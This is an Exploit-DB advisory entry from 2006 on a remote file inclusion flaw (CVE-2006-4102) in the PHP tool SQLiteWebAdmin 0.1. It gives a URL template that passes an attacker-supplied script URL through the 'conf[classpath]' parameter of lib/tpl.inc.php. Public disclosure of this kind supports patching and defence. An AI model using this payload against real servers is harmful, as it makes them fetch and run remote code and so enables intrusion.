EXPLOITS

SQLiteWebAdmin 0.1 - 'tpl.inc.php' Remote File Inclusion

Author: SirDarckCat
type: webapps
platform: php
port: 
date_added: 2006-08-06  
date_updated: 2016-08-31  
verified: 1  
codes: OSVDB-29087;CVE-2006-4102  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comSQLiteWebAdmin-0.1.tar.gz  

raw file: 2123.txt  

SQLiteWebAdmin
http://sourceforge.net/projects/sqlitewebadmin

SQLiteWebAdmin is a simple PHP program for administrating
a SQL DataBase.

It suffers of a Remote File Inclusion Vulnerability.

The bug is in the "tpl.inc.php" program in the "lib"
directory, and is exploited when passing the parameter
"conf[classpath]".

http://www.server.com/lib/tpl.inc.php?conf[classpath]=[URL-OF-SCRIPT]

Succesfull explotation, needs register_globals=on

Att.
SirDarckCat
elhacker.net

# milw0rm.com [2006-08-07]